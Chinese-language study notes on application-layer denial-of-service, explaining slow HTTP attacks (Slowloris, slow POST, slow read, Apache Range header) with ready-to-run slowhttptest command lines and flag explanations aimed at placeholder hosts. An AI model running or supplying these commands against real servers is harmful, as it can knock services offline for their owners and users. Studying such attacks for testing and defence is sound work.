应用层DoS

服务代码存在漏洞，遇到异常提交数据时程序崩溃

应用处理大量并发请求能力有限，被拒绝的是应用或OS

缓冲区溢出 模糊测试

CesarFTP 0.99

Ms12-020 远程桌面协议DoS

Slowhttptest工具（源自google）

收录了4种攻击方法

低带宽应用层慢速DoS攻击（相比于CC等快速攻击而言的慢速）

最早由python，跨平台，貌似用c重写了

尤其擅长攻击apache，tomcat，消耗应用的连接池

如果没有用反向代理的话，一打就死，几乎百发百中

攻击方法

Slowloris，Slow HTTP POST攻击

   耗尽应用的并发连接池，类似于Http层的Syn flood

   HTTP协议默认在服务器全部接受请求之后才开始处理，若客户端发送速度缓慢或不完整，服务器时钟为其保留连接池占用，此类大量并发导致DoS

   Slowloris：完整的http请求结尾是\r\n\r\n,攻击发\r\n......

   Slow POST：HTTP头表明长度，但body部分缓慢发送

Slow Read attack攻击

   与sloworis and slow POST目的相同，都是耗尽应用并发链接池

   不同之处在于请求正常发送，但慢速读取响应数据

   攻击者调整TCP window窗口大小，是服务器慢速返回数据

Apache Range header attack攻击

   针对apache

   客户端传输大文件时，体积超过HTTP Body大小限制时进行分段，耗尽服务器的CPU内存资源

查看系统资源分配

     ulimit -a

HTTP Post 攻击模式

slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB
-u http://1.1.1.1 -x 10 -p 3

Slowloris攻击

slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http://1.1.1.1 -x 24 -p 3

apache range header attack攻击

slowhttptest -R -u http://host.example.com/ -t HEAD -c 1000 -a 10  -b 3000 -r 500

slow read attack攻击

slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://host.example.com/resources/index.html -p 3

-c 建立的链接数

-H slowloris攻击方式

-t 使用什么方法

-u 攻击的URL

-p 多少秒不响应则认为目标DoS

-r 每秒连接并发几个

-l 制定攻击时间

支持代理

大量应用服务器和安全设备都无法防护慢速攻击

还有一类拒绝服务攻击

炸邮件，使用垃圾邮件塞满邮箱

无意识/非故意的拒绝服务攻击

数据库服务器宕机恢复后，引用队列大量请求洪水涌来

告警邮件在邮件服务器修改地址够洪水攻击防火墙